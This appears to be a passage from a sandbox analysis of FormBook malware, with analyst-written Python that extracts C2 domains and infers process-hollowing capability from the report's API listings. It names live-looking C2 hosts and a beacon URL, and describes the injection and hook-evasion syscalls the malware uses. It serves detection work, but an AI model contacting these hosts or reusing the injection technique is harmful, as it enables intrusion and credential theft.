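The URL list above mixes three kinds of string. The hosts that carry the shared path `/mq3/` (greenerpharms.com, hugoph.com, icbjesusdenazaret.net, operatorcloud.net, porcber.com, r-ev-ival.com, rolex218238.com, sj233.com, snagabag31.com, tams.rocks, wwwx36599.com, xn--3bst11cpvj0o2a.com, yoxi.ltd, plus aaronnational.com and 3dcellmodelscongress.com, which only appear glued to another entry) are the sample's C2 candidate set; FormBook carries a list of such hosts and the sandbox string scanner reads adjacent config entries as one string, which is why forms like `www.porcber.com/mq3/www.hugoph.com` and `www.porcber.comReferer:` (host followed by an HTTP header template) show up. The font-foundry URLs (goodfont.co.kr, sakkal.com, sandoll.co.kr, jiyu-kobo.co.jp, tiro.com, typography.net, zhongyicts.com.cn) also appear in the untouched stage-0 explorer.exe image and are not indicators, and the GitHub and google.ch strings are unrelated residue. The extractor below is an added example of my own (not code from this report or from Joe Sandbox) that turns such a dump into a deduplicated C2 list without a hand-written allowlist: it picks the most common first path segment as the campaign path and keeps only hosts seen with it, directly or glued on after it. The function names, the constructed `MEMORY_STRINGS` subset and the `www.`-prefixed URL reconstruction are my assumptions.

```python
import re
from collections import Counter

# Constructed sample: a subset of the "String found in binary or memory" values listed
# in this report (explorer.exe and NETSTAT.EXE memory), plus non-C2 strings for contrast.
MEMORY_STRINGS = [
    "http://www.goodfont.co.kr",                        # font-foundry URL, also in stage-0 explorer.exe
    "http://www.greenerpharms.com",
    "http://www.greenerpharms.com/mq3/",
    "http://www.greenerpharms.com/mq3/www.sj233.com",   # two adjacent config entries read as one string
    "http://www.greenerpharms.comReferer:",             # host immediately followed by a header template
    "http://www.hugoph.com/mq3/www.xn--3bst11cpvj0o2a.com",
    "http://www.wwwx36599.com/mq3/S",                   # trailing garbage byte, not a glued host
    "http://www.typography.netD",
    "https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR",
    "https://github.com/KamilBest/2048Game",            # unrelated string from the dropped binary
]

# host, first path segment, and an optional second host glued directly after the path
ENTRY_RE = re.compile(
    r"https?://(?:www\.)?([a-z0-9.-]+\.[a-z]{2,})/([a-z0-9]+)/(?:www\.([a-z0-9.-]+\.[a-z]{2,}))?",
    re.IGNORECASE,
)


def extract_c2(strings):
    """Return the campaign path and the C2 hosts implied by a FormBook strings dump.

    The path is the first path segment seen in the most URLs; a host counts as C2 only
    if it appears with that path (directly or glued to the end of another entry).
    Bare hosts, '...Referer:' forms and font/GitHub noise never match and are dropped.
    """
    hits = []
    for s in strings:
        m = ENTRY_RE.search(s)
        if m:
            hits.append((m.group(1).lower(), m.group(2).lower(), (m.group(3) or "").lower()))
    if not hits:
        return {"path": None, "domains": [], "urls": []}
    path = Counter(p for _, p, _ in hits).most_common(1)[0][0]
    domains = set()
    for host, p, glued in hits:
        if p == path:
            domains.add(host)
            if glued:
                domains.add(glued)
    ordered = sorted(domains)
    # Assumption: every entry in this family is requested as http://www.<host>/<path>/,
    # which is the form the report shows for all of them.
    return {"path": path, "domains": ordered, "urls": [f"http://www.{d}/{path}/" for d in ordered]}


def display_name(domain):
    """Decode punycode labels (xn--...) for an analyst-readable view; falls back to ASCII."""
    try:
        return domain.encode("ascii").decode("idna")
    except (UnicodeError, ValueError):
        return domain


if __name__ == "__main__":
    result = extract_c2(MEMORY_STRINGS)
    print("campaign path:", result["path"])
    for d in result["domains"]:
        print(f"  {d:40s} {display_name(d)}")
```

Running it over the full list from this report yields fifteen hosts under `/mq3/`; feed the `urls` list to proxy or DNS blocking, and keep the host-only forms as weaker indicators, since FormBook operators are known to register many candidate domains of which only some ever answer.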

Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logri.ini
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrf.ini
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419830 NtCreateFile
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_004198E0 NtReadFile
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419960 NtClose
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419A10 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041982A NtCreateFile
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_004198DA NtReadFile
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041995B NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A350 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A310 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A3D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A240 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A260 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A2D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A800 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A750 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A610 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A540 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A470 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343ACE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A370 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A220 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343BA30 NtSetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A2F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B0B0 NtGetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A700 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A710 NtQuerySection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A720 NtResumeThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A780 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A650 NtQueueApcThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A6D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343BD40 NtSuspendThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A520 NtEnumerateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A5F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A5A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A460 NtOpenProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B470 NtOpenThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B410 NtOpenProcessToken
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A430 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A4A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E79A10 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E798E0 NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E79830 NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E79960 NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E798DA NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E7982A NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E7995B NtClose
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00419830 NtCreateFile
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_004198E0 NtReadFile
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00419960 NtClose
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00419A10 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_0041982A NtCreateFile
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_004198DA NtReadFile
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_0041995B NtClose
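Two things in the native-API listing above are worth pulling out rather than reading line by line. First, only NETSTAT.EXE (process 6) has the complete toolkit for the hollowing and thread-injection behaviour flagged in the signature summary: a target-creation primitive (NtCreateProcessEx, NtOpenProcess, NtOpenThread), a write-into-target primitive (NtUnmapViewOfSection, NtMapViewOfSection, NtWriteVirtualMemory, NtProtectVirtualMemory) and an execution-hijack primitive (NtSetContextThread, NtQueueApcThread, NtResumeThread), while the Scan_06032020.exe and ufipp6ljxlz.exe stage-2 images (processes 4 and 17) only expose file and allocation calls. Those stubs sit at 0x0343Axxx, a heap-range address rather than ntdll's image, which fits FormBook's documented habit of calling its own copy of ntdll's syscall stubs to sidestep user-mode hooks; that is an interpretation, not something the listing alone proves. Second, the 6_2_02E79830 / 02E798E0 / 02E79960 / 02E79A10 functions in NETSTAT.EXE sit at exactly the same offsets (0x19830, 0x198E0, 0x19960, 0x19A10) from the Yara-matched region at 0x02E60000 as the 0x00419830 family sits from 0x00400000 in processes 4 and 17, so the same unpacked FormBook image is mapped in all three, which is the concrete evidence behind "Injects a PE file into a foreign processes". The script below is an added example of my own (not part of this report or of Joe Sandbox) that derives both findings mechanically from the report lines; the constructed `YARA_REGIONS` and `CODE_FUNCTIONS` samples are copied from this page, the primitive categories and my reading of the `.sdmp` name fields (pid, then the region base address, then a Win32 PAGE_* protection value, so 0x40 is PAGE_EXECUTE_READWRITE) are my assumptions, and the script accepts the lines both in their raw form and with the trailing duplicate id stripped.

```python
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant

# Constructed sample: region names from the "Yara detected FormBook" list above.
YARA_REGIONS = [
    "00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp",
    "00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp",
    "00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp",
    "00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp",
    "00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp",
    "00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp",
    "00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp",
    "00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp",
]

# Constructed sample: a subset of the "Code function" lines above, in their raw form.
CODE_FUNCTIONS = [
    r"Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419830 NtCreateFile,4_2_00419830",
    r"Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419A10 NtAllocateVirtualMemory,4_2_00419A10",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A480 NtMapViewOfSection,LdrInitializeThunk,6_2_0343A480",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A4A0 NtUnmapViewOfSection,6_2_0343A4A0",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A5A0 NtWriteVirtualMemory,6_2_0343A5A0",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343BA30 NtSetContextThread,6_2_0343BA30",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A650 NtQueueApcThread,6_2_0343A650",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A6D0 NtCreateProcessEx,6_2_0343A6D0",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A720 NtResumeThread,6_2_0343A720",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79830 NtCreateFile,6_2_02E79830",
    r"Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79A10 NtAllocateVirtualMemory,6_2_02E79A10",
    r"Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419830 NtCreateFile,17_2_00419830",
    r"Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419A10 NtAllocateVirtualMemory,17_2_00419A10",
]

# <pid>.<stage>.<serial>.<base address>.<protection>.<type>.sdmp  (my reading of the name fields)
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")
# <pid>_<stage>_<address> followed by comma-separated callees; the raw form repeats the id at the end
CODE_RE = re.compile(r"Code function:\s*(\d+)_\d+_([0-9A-Fa-f]{8})\s*(.*)$")
ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")

# Primitive categories (my grouping): a process needs one of each to hollow or APC-inject.
OPEN_TARGET = {"NtOpenProcess", "NtCreateProcessEx", "NtOpenThread", "NtCreateUserProcess"}
WRITE_INTO_TARGET = {"NtWriteVirtualMemory", "NtMapViewOfSection", "NtUnmapViewOfSection", "NtProtectVirtualMemory"}
HIJACK_EXECUTION = {"NtSetContextThread", "NtQueueApcThread", "NtResumeThread", "NtCreateThreadEx"}


def parse_regions(names):
    """pid -> sorted list of (base address, protection) for the Yara-matched dump regions."""
    regions = defaultdict(list)
    for name in names:
        m = SDMP_RE.match(name)
        if m:
            regions[int(m.group(1), 16)].append((int(m.group(2), 16), int(m.group(3), 16)))
    for pid in regions:
        regions[pid].sort()
    return regions


def parse_code_functions(lines):
    """List of (pid, address, [callee names]); works on raw lines and on cleaned ones."""
    records = []
    for line in lines:
        m = CODE_RE.search(line)
        if not m:
            continue
        callees = [t for t in m.group(3).split(",") if t and not ID_RE.match(t)]
        records.append((int(m.group(1)), int(m.group(2), 16), callees))
    return records


def injection_capable(records):
    """PIDs whose resolved Nt* stubs cover all three stages of a hollowing/APC injection."""
    apis = defaultdict(set)
    for pid, _, callees in records:
        apis[pid].update(callees)
    return {pid for pid, s in apis.items() if s & OPEN_TARGET and s & WRITE_INTO_TARGET and s & HIJACK_EXECUTION}


def shared_rvas(records, regions):
    """(callee, offset) -> set of PIDs, for functions at the same offset from the nearest
    Yara-matched region base in more than one process: the same image at different bases."""
    seen = defaultdict(set)
    for pid, addr, callees in records:
        bases = [b for b, _ in regions.get(pid, []) if b <= addr]
        if bases:
            rva = addr - max(bases)
            for callee in callees:
                seen[(callee, rva)].add(pid)
    return {k: v for k, v in seen.items() if len(v) > 1}


def summarize(region_names, code_lines):
    regions = parse_regions(region_names)
    records = parse_code_functions(code_lines)
    return {
        "injection_capable": sorted(injection_capable(records)),
        "rwx_regions": {pid: [hex(b) for b, p in r if p == PAGE_EXECUTE_READWRITE] for pid, r in regions.items()},
        "shared_rvas": {f"{api}+0x{rva:x}": sorted(pids) for (api, rva), pids in shared_rvas(records, regions).items()},
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(YARA_REGIONS, CODE_FUNCTIONS), indent=2))
```

The offset match is only meaningful when the region list comes from the same report as the function list, since the nearest-base heuristic has no region sizes to check against; on the full page it pairs every 0x0041xxxx function in processes 4 and 17 with its 0x02E7xxxx twin in NETSTAT.EXE and leaves the 0x0343Axxx stubs unpaired, which is the expected split.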
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01012208
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01010472
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01010FC0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01013110
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01011839
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01014B80
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01014B90
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01010F2C
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01012FCE
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010151D8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010151E8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010130A9
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010130BC
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010153F8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01015408
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0101F7F0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010156A0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010156B0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01013F79
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01013F88
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_09DDF798
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_09DDF78A
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C4151
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C30D8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C2650
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C4490
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C4207
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C310D
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C1030
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C1020
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C30C9
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00401030
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041D9C8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00402D89
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00402D90
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041DEEC
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00409F5B
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00409F60
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00402FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0341FB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034263C2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03424B96
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_033FEBE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03424A5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B0A02
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034CE214
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342523D
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C22DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1A99
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034142B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342594B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03449906
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03427110
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B61DF
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C19E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03426180
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034CD9BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03421070
